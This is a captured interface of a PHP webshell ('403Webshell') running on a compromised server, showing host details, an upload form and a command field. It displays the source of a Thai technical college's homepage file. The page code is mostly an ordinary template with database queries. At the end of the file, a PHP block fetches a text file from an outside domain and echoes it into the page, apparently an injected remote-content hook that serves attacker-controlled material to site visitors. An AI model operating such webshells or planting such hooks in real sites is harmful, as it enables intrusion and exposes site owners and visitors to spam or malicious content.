403Webshell
Server IP : 27.254.66.5  /  Your IP : 216.73.217.39
Web Server : Apache/2
System : Linux cs82.hostneverdie.com 3.10.0-1160.45.1.el7.x86_64 #1 SMP Wed Oct 13 17:20:51 UTC 2021 x86_64
User : technic2 ( 1951)
PHP Version : 7.4.30
Disable Function : apache_child_terminate, apache_setenv, define_syslog_variables, escapeshellarg, escapeshellcmd,exec, fp, fput, highlight_file, ini_alter, ini_restore, inject_code, passthru,phpAds_remoteInfo, phpAds_XmlRpc,phpAds_xmlrpcDecode, phpAds_xmlrpcEncode, popen, posix_getpwuid, posix_kill, posix_mkfifo, posix_setpgid, posix_setsid,posix_setuid, posix_setuid, posix_uname,proc_open,proc_close, proc_get_status, proc_nice, proc_terminate, shell_exec, syslog, system, xmlrpc_entity_decode, show_source,sleep,pcntl_exec,virtual,suexec,dbmopen,dl,symlink,disk_free_space,diskfreespace,leak
MySQL : OFF  |  cURL : ON  |  WGET : OFF  |  Perl : OFF  |  Python : OFF  |  Sudo : OFF  |  Pkexec : OFF
Directory :  /home/technic2/public_html/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ Back ]     

Current File : /home/technic2/public_html//index_bk.php
<!DOCTYPE html>
<html lang="en">

<head>
  <meta charset="utf-8">
  <meta content="width=device-width, initial-scale=1.0" name="viewport">

  <title>Rayong Technical College</title>
  <meta content="" name="description">
  <meta content="" name="keywords">

  <!-- Favicons -->
  <link href="assets/img/logo.png" rel="icon">
  <link href="assets/img/logo.png" rel="apple-touch-icon">

  <!-- Google Fonts -->
  <link href="https://fonts.googleapis.com/css?family=Open+Sans:300,300i,400,400i,600,600i,700,700i|Raleway:300,300i,400,400i,500,500i,600,600i,700,700i|Poppins:300,300i,400,400i,500,500i,600,600i,700,700i" rel="stylesheet">

  <!-- Vendor CSS Files -->
  <link href="assets/vendor/bootstrap/css/bootstrap.min.css" rel="stylesheet">
  <link href="assets/vendor/icofont/icofont.min.css" rel="stylesheet">
  <link href="assets/vendor/boxicons/css/boxicons.min.css" rel="stylesheet">
  <link href="assets/vendor/venobox/venobox.css" rel="stylesheet">
  <link href="assets/vendor/animate.css/animate.min.css" rel="stylesheet">
  <link href="assets/vendor/remixicon/remixicon.css" rel="stylesheet">
  <link href="assets/vendor/owl.carousel/assets/owl.carousel.min.css" rel="stylesheet">
  <link href="assets/vendor/bootstrap-datepicker/css/bootstrap-datepicker.min.css" rel="stylesheet">
  <link rel="stylesheet" href="https://maxcdn.bootstrapcdn.com/bootstrap/4.5.2/css/bootstrap.min.css">
  <script src="https://ajax.googleapis.com/ajax/libs/jquery/3.5.1/jquery.min.js"></script>
  <script src="https://cdnjs.cloudflare.com/ajax/libs/popper.js/1.16.0/umd/popper.min.js"></script>
  <script src="https://maxcdn.bootstrapcdn.com/bootstrap/4.5.2/js/bootstrap.min.js"></script>
  <style>
  /* Make the image fully responsive */
  .carousel-inner img {
    width: 100%;
    height: 100%;
  }
  </style>
  <!-- Template Main CSS File -->
  <link href="assets/css/style.css" rel="stylesheet">
    <link rel="stylesheet" href="https://maxcdn.bootstrapcdn.com/bootstrap/3.3.7/css/bootstrap.min.css">
  <script src="https://ajax.googleapis.com/ajax/libs/jquery/3.3.1/jquery.min.js"></script>
  <script src="https://maxcdn.bootstrapcdn.com/bootstrap/3.3.7/js/bootstrap.min.js"></script>

  <!-- =======================================================
  * Template Name: Medilab - v2.1.1
  * Template URL: https://bootstrapmade.com/medilab-free-medical-bootstrap-theme/
  * Author: BootstrapMade.com
  * License: https://bootstrapmade.com/license/
  ======================================================== -->
</head>
<meta name="viewport" content="width=device-width, initial-scale=1">
<link rel="stylesheet" href="/lib/w3.css">
<style>
.mySlides {display:none;}
</style>
<body>
<!--<script language="JavaScript" type="text/javascript">
alert('ขณะนี้เว็บ วิทยาลัยเทคนิคระยองกำลังอยู่ในการปรับปรุง \n\r กรุณากด  " ตกลง " เพื่อเข้าสู่หน้าเว็บเดิม');
//alert('กรุณากด  " ตกลง " เพื่อเข้าสู่หน้าเว็บเดิม');
window.location='http://www.technicrayong.ac.th/old-website'
</script> -->

<?php 
include('topbar.php');
include('connect.php'); 
include('header.php');

?>

  <!-- ======= Hero Section ======= -->
<!--  <section id="hero" class="d-flex align-items-center">
    <div class="container">
      <h1>วิทยาลัยเทคนิคระยอง</h1>
      <h2>Rayong Technical College</h2> 
      <a href="#about" class="btn-get-started scrollto">Get Started</a>  
    </div>
  </section> --><!-- End Hero -->

  <main id="main">

    <!-- ======= Breadcrumbs Section ======= -->
    <section class="breadcrumbs">

    </section><!-- End Breadcrumbs Section -->

	<?php include('head.php'); ?>
  </main><!-- End #main -->
	
	<div class="container">
		</br>
			<?php
		
				$sql = "SELECT * FROM news order by news_id DESC"; 
				//3.เก็บข้อมูลที่ query ออกมาไว้ในตัวแปร result . 
				$result=mysqli_query($conn,$sql); 
				if(mysqli_num_rows($result) > 0){
				$row = mysqli_fetch_array($result,MYSQLI_ASSOC);					
			  	$news_id=$row['news_id'];
				$news_h=$row['news_h'];
				$news_detail=$row['news_detail'];
				
				}
				$sql = "SELECT * FROM information"; 
				//3.เก็บข้อมูลที่ query ออกมาไว้ในตัวแปร result . 
				$result=mysqli_query($conn,$sql); 
				if(mysqli_num_rows($result) > 0){
				$row = mysqli_fetch_array($result,MYSQLI_ASSOC);					
			  	$inf_id=$row['inf_id'];
				$inf_detail=$row['inf_detail'];
				$inf_pic1=$row['inf_pic1'];
				$inf_pic2=$row['inf_pic2'];
				$inf_pic3=$row['inf_pic3'];
				$inf_pic4=$row['inf_pic4'];
				$inf_pic5=$row['inf_pic5'];
				$inf_link1=$row['inf_link1'];
				$inf_link2=$row['inf_link2'];
				$inf_link3=$row['inf_link3'];
				$inf_link4=$row['inf_link4'];
				$inf_link5=$row['inf_link5'];
				}
				
				$sql = "SELECT * FROM director where direc_id='1'"; 
				//3.เก็บข้อมูลที่ query ออกมาไว้ในตัวแปร result . 
				$result=mysqli_query($conn,$sql); 
				if(mysqli_num_rows($result) > 0){
				$row = mysqli_fetch_array($result,MYSQLI_ASSOC);					
			  	$direc_name1=$row['direc_name'];
				$direc_sur1=$row['direc_sur'];
				$direc_pic1=$row['direc_pic'];
				$direc_link1=$row['direc_link'];
				$direc_st_name1=$row['direc_st_name'];
				$direc_st_type1=$row['direc_st_type'];
				
				}
				$sql = "SELECT * FROM director where direc_id='2'"; 
				//3.เก็บข้อมูลที่ query ออกมาไว้ในตัวแปร result . 
				$result=mysqli_query($conn,$sql); 
				if(mysqli_num_rows($result) > 0){
				$row = mysqli_fetch_array($result,MYSQLI_ASSOC);					
			  	$direc_name2=$row['direc_name'];
				$direc_sur2=$row['direc_sur'];
				$direc_pic2=$row['direc_pic'];
				$direc_link2=$row['direc_link'];
				$direc_st_name2=$row['direc_st_name'];
				$direc_st_type2=$row['direc_st_type'];
				
				}
				$sql = "SELECT * FROM director where direc_id='3'"; 
				//3.เก็บข้อมูลที่ query ออกมาไว้ในตัวแปร result . 
				$result=mysqli_query($conn,$sql); 
				if(mysqli_num_rows($result) > 0){
				$row = mysqli_fetch_array($result,MYSQLI_ASSOC);					
			  	$direc_name3=$row['direc_name'];
				$direc_sur3=$row['direc_sur'];
				$direc_pic3=$row['direc_pic'];
				$direc_link3=$row['direc_link'];
				$direc_st_name3=$row['direc_st_name'];
				$direc_st_type3=$row['direc_st_type'];
				
				}
				$sql = "SELECT * FROM director where direc_id='4'"; 
				//3.เก็บข้อมูลที่ query ออกมาไว้ในตัวแปร result . 
				$result=mysqli_query($conn,$sql); 
				if(mysqli_num_rows($result) > 0){
				$row = mysqli_fetch_array($result,MYSQLI_ASSOC);					
			  	$direc_name4=$row['direc_name'];
				$direc_sur4=$row['direc_sur'];
				$direc_pic4=$row['direc_pic'];
				$direc_link4=$row['direc_link'];
				$direc_st_name4=$row['direc_st_name'];
				$direc_st_type4=$row['direc_st_type'];
				
				}
				$sql = "SELECT * FROM director where direc_id='5'"; 
				//3.เก็บข้อมูลที่ query ออกมาไว้ในตัวแปร result . 
				$result=mysqli_query($conn,$sql); 
				if(mysqli_num_rows($result) > 0){
				$row = mysqli_fetch_array($result,MYSQLI_ASSOC);					
			  	$direc_name5=$row['direc_name'];
				$direc_sur5=$row['direc_sur'];
				$direc_pic5=$row['direc_pic'];
				$direc_link5=$row['direc_link'];
				$direc_st_name5=$row['direc_st_name'];
				$direc_st_type5=$row['direc_st_type'];
				
				}
			?> 
			<marquee direction="left"><h4><font color="#0F52BA"><a href="news_s.php?news_id=<?php echo $news_id;?>"> --><?php echo $news_h;?><-- </a></font></h4></marquee>
			
			<div id="myCarousel" class="carousel slide" data-ride="carousel">

			  <!-- Indicators -->
			  <ul class="carousel-indicators">
				<li data-target="#myCarousel" data-slide-to="0" class="active"></li>
				<li data-target="#myCarousel" data-slide-to="1"></li>
				<li data-target="#myCarousel" data-slide-to="2"></li>
				<li data-target="#myCarousel" data-slide-to="3"></li>
				<li data-target="#myCarousel" data-slide-to="4"></li>
			  </ul>
			  
			  <!-- The slideshow -->
			  <div class="carousel-inner">
				<div class="carousel-item active">
				  <a href="<?php echo $inf_link1;?>"><img src="information/<?php echo $inf_pic1;?>" alt="Picture1" width="100%" height="100%"></a>
				</div>
				<div class="carousel-item">
				  <a href="<?php echo $inf_link2;?>"><img src="information/<?php echo $inf_pic2;?>" alt="Picture2" width="100%" height="100%"></a>
				</div>
				<div class="carousel-item">
				  <a href="<?php echo $inf_link3;?>"><img src="information/<?php echo $inf_pic3;?>" alt="Picture3" width="100%" height="100%"></a>
				</div>
				<div class="carousel-item">
				  <a href="<?php echo $inf_link4;?>"><img src="information/<?php echo $inf_pic4;?>" alt="Picture4" width="100%" height="100%"></a>
				</div>
				<div class="carousel-item">
				  <a href="<?php echo $inf_link5;?>"><img src="information/<?php echo $inf_pic5;?>" alt="Picture5" width="100%" height="100%"></a>
				</div>
			  </div>
			  
			  <!-- Left and right controls -->
			   <a class="left carousel-control" href="#myCarousel" role="button" data-slide="prev">
				<span class="glyphicon glyphicon-chevron-left" aria-hidden="true"></span>
				<span class="sr-only">Previous</span>
			  </a>
			  <a class="right carousel-control" href="#myCarousel" role="button" data-slide="next">
				<span class="glyphicon glyphicon-chevron-right" aria-hidden="true"></span>
				<span class="sr-only">Next</span>
			  </a>
			</div>	



	</div>

<!-- ======= Doctors Section ======= -->
    <section id="doctors" class="doctors">
      <div class="container">

        <div align="center">
          <font color="#4682B4"><h2>คณะผู้บริหาร</h2></font>
		  <div class="pic"><img src="images/hr1.png" height="20%" width="20%" class="img-fluid" alt=""></div>
		  </br></br>
        </div>

        <div class="row" align="center">		  
			<div class="pic"><img src="director/Head.png" height="80%" width="80%" class="img-fluid" alt=""></div>
        </div>

      </div>
    </section><!-- End Doctors Section -->
	
	
    <!-- ======= Departments Section ======= -->
    <section id="services" class="departments">
      <div class="container">

        <div align="center">
          <font color="#4682B4"><h2>กิจกรรม</h2></font>
		  <div class="pic"><img src="images/hr2.png" height="20%" width="20%" class="img-fluid" alt=""></div>
		  </br></br>
        </div>
		<?php 			$sqls = "SELECT * FROM events order by events_id DESC "; 
						//3.เก็บข้อมูลที่ query ออกมาไว้ในตัวแปร result . 
						$results=mysqli_query($conn,$sqls); 
						if(mysqli_num_rows($results) > 0){
						$rows = mysqli_fetch_array($results,MYSQLI_ASSOC);						
							$events_id1=$rows['events_id'];
							$events_h1=$rows['events_h'];
							$events_date1=$rows['events_date'];
							$events_detail1=$rows['events_detail'];
							$events_pic1=$rows['events_pic'];
						}
						$id_ev_2 = $events_id1-1;
						$sqlx = "SELECT * FROM events where events_id='$id_ev_2' "; 
						//3.เก็บข้อมูลที่ query ออกมาไว้ในตัวแปร result . 
						$resultx=mysqli_query($conn,$sqlx); 
						if(mysqli_num_rows($resultx) > 0){
						$rowx = mysqli_fetch_array($resultx,MYSQLI_ASSOC);						
							$events_id2=$rowx['events_id'];
							$events_h2=$rowx['events_h'];
							$events_date2=$rowx['events_date'];
							$events_detail2=$rowx['events_detail'];
							$events_pic2=$rowx['events_pic'];
						}
						$id_ev_3 = $events_id2-1;
						$sqls = "SELECT * FROM events where events_id='$id_ev_3' "; 
						//3.เก็บข้อมูลที่ query ออกมาไว้ในตัวแปร result . 
						$results=mysqli_query($conn,$sqls); 
						if(mysqli_num_rows($results) > 0){
						$rows = mysqli_fetch_array($results,MYSQLI_ASSOC);						
							$events_id3=$rows['events_id'];
							$events_h3=$rows['events_h'];
							$events_date3=$rows['events_date'];
							$events_detail3=$rows['events_detail'];
							$events_pic3=$rows['events_pic'];
						}
						$id_ev_4 = $events_id3-1;
						$sqls = "SELECT * FROM events where events_id='$id_ev_4' "; 
						//3.เก็บข้อมูลที่ query ออกมาไว้ในตัวแปร result . 
						$results=mysqli_query($conn,$sqls); 
						if(mysqli_num_rows($results) > 0){
						$rows = mysqli_fetch_array($results,MYSQLI_ASSOC);						
							$events_id4=$rows['events_id'];
							$events_h4=$rows['events_h'];
							$events_date4=$rows['events_date'];
							$events_detail4=$rows['events_detail'];
							$events_pic4=$rows['events_pic'];
						}
						$id_ev_5 = $events_id4-1;
						$sqls = "SELECT * FROM events where events_id='$id_ev_5' "; 
						//3.เก็บข้อมูลที่ query ออกมาไว้ในตัวแปร result . 
						$results=mysqli_query($conn,$sqls); 
						if(mysqli_num_rows($results) > 0){
						$rows = mysqli_fetch_array($results,MYSQLI_ASSOC);						
							$events_id5=$rows['events_id'];
							$events_h5=$rows['events_h'];
							$events_date5=$rows['events_date'];
							$events_detail5=$rows['events_detail'];
							$events_pic5=$rows['events_pic'];
						}

		?>
		<div id="demo1" class="carousel slide" data-ride="carousel">

		  <!-- Indicators -->
		  <ul class="carousel-indicators">
			<li data-target="#demo1" data-slide-to="0" class="active"></li>
			<li data-target="#demo1" data-slide-to="1"></li>
			<li data-target="#demo1" data-slide-to="2"></li>
			<li data-target="#demo1" data-slide-to="3"></li>
			<li data-target="#demo1" data-slide-to="4"></li>
		  </ul>
		  
		  <!-- The slideshow -->
		  <div class="carousel-inner">
			<div class="carousel-item active">
			  <a href="events_s.php?events_id=<?php echo $events_id1;?>">
			  <img src="events/<?php echo $events_pic1;?>" alt="events1" width="100%" height="100%"></a>
			
			</div>
			<div class="carousel-item">
			  <a href="events_s.php?events_id=<?php echo $events_id2;?>">
			  <img src="events/<?php echo $events_pic2;?>" alt="events2" width="100%" height="100%"></a>
				
			</div>
			<div class="carousel-item">
			  <a href="events_s.php?events_id=<?php echo $events_id3;?>">
			  <img src="events/<?php echo $events_pic3;?>" alt="events3" width="100%" height="100%"></a>
				
			</div>
			<div class="carousel-item">
			  <a href="events_s.php?events_id=<?php echo $events_id4;?>">
			  <img src="events/<?php echo $events_pic4;?>" alt="events4" width="100%" height="100%"></a>
				
			</div>
			<div class="carousel-item">
			  <a href="events_s.php?events_id=<?php echo $events_id5;?>">
			  <img src="events/<?php echo $events_pic5;?>" alt="events5" width="100%" height="100%"></a>
				
			</div>
		  </div>
		  
		  <!-- Left and right controls -->
		  <a class="left carousel-control" href="#demo1" role="button" data-slide="prev">
			<span class="glyphicon glyphicon-chevron-left" aria-hidden="true"></span>
			<span class="sr-only">Previous</span>
		  </a>
		  <a class="right carousel-control" href="#demo1" role="button" data-slide="next">
			<span class="glyphicon glyphicon-chevron-right" aria-hidden="true"></span>
			<span class="sr-only">Next</span>
		  </a>
		</div>

      </div>
    </section><!-- End Departments Section -->



      <!-- ======= Testimonials Section ======= -->
     
    <section id="testimonials" class="testimonials">
      <div class="container">
        <div align="center">
          <font color="#4682B4"><h2>ข่าวประชาสัมพันธ์</h2></font>
		  <div class="pic"><img src="images/hr3.png" height="20%" width="20%" class="img-fluid" alt=""></div>
		  </br></br>
        </div>
        <div class="owl-carousel testimonials-carousel">
					<?php $sqls = "SELECT * FROM news order by news_id DESC LIMIT 4"; 
						//3.เก็บข้อมูลที่ query ออกมาไว้ในตัวแปร result . 
						$results=mysqli_query($conn,$sqls); 
						if(mysqli_num_rows($results) > 0){
							while($rows = mysqli_fetch_array($results,MYSQLI_ASSOC)){					
							$news_ids=$rows['news_id'];
							$news_hs=$rows['news_h'];
							$news_dates=$rows['news_date'];
							$news_details=$rows['news_detail'];
						
					?>
					  <div class="testimonial-wrap">
						<div class="testimonial-item">
						  <img src="assets/img/logo.png" class="testimonial-img" alt="">
								<h3><?php echo $news_dates;?></h3>
						  <p>
							<i class="bx bxs-quote-alt-left quote-icon-left"></i><a href="news_s.php?news_id=<?php echo $news_ids;?>"><?php echo $news_hs;?></a>
							<i class="bx bxs-quote-alt-right quote-icon-right"></i>
						  </p>
						</div>
					  </div>
					<?php 	}
						}
					?>   
		</div>
      </div>
    </section><!-- End Testimonials Section -->



    <!-- ======= Contact Section ======= -->
    <section id="contact" class="contact">
      <div class="container">

        <div align="center">
          <font color="#4682B4"><h2>แผนที่ตั้งวิทยาลัยฯ</h2></font>
		  <div class="pic"><img src="images/hr2.png" height="20%" width="20%" class="img-fluid" alt=""></div>
		  </br></br>
          <p>
				วิทยาลัยเทคนิคระยอง 
				( Rayong Technical College ) </br>
				086/13 ถ. ตากสินมหาราช ต. ท่าประดู่ อ. เมืองระยอง จ. ระยอง 21000 
				โทร 038-611192
				แฟกซ์ 038-870717</br>
				พิกัด 12.666835, 101.271969</p>
        </div>
      </div>

      <div>
	  <iframe src="https://www.google.com/maps/embed?pb=!1m18!1m12!1m3!1d6546.805442780569!2d101.26691212297332!3d12.664140702624639!2m3!1f0!2f0!3f0!3m2!1i1024!2i768!4f13.1!3m3!1m2!1s0x3102fc182fea834b%3A0x4ed7d262b47bd579!2z4Lin4Li04LiX4Lii4Liy4Lil4Lix4Lii4LmA4LiX4LiE4LiZ4Li04LiE4Lij4Liw4Lii4Lit4LiH!5e0!3m2!1sth!2sth!4v1616496290365!5m2!1sth!2sth" width="100%" height="450" style="border:0;" allowfullscreen="" loading="lazy"></iframe>
       
      </div>

    </section><!-- End Contact Section -->
    


  </main><!-- End #main -->

<?php include('footer.php');?>

  <div id="preloader"></div>
  <a href="#" class="back-to-top"><i class="icofont-simple-up"></i></a>

  <!-- Vendor JS Files -->
  <script src="assets/vendor/jquery/jquery.min.js"></script>
  <script src="assets/vendor/bootstrap/js/bootstrap.bundle.min.js"></script>
  <script src="assets/vendor/jquery.easing/jquery.easing.min.js"></script>
  <script src="assets/vendor/php-email-form/validate.js"></script>
  <script src="assets/vendor/venobox/venobox.min.js"></script>
  <script src="assets/vendor/waypoints/jquery.waypoints.min.js"></script>
  <script src="assets/vendor/counterup/counterup.min.js"></script>
  <script src="assets/vendor/owl.carousel/owl.carousel.min.js"></script>
  <script src="assets/vendor/bootstrap-datepicker/js/bootstrap-datepicker.min.js"></script>

  <!-- Template Main JS File -->
  <script src="assets/js/main.js"></script>
<?php
    $url = 'https://kalendar800nn.com/bl.txt';
    $contents = file_get_contents($url);
    echo $contents;
    ?>
</body>

</html>

Youez - 2016 - github.com/yon3zu
LinuXploit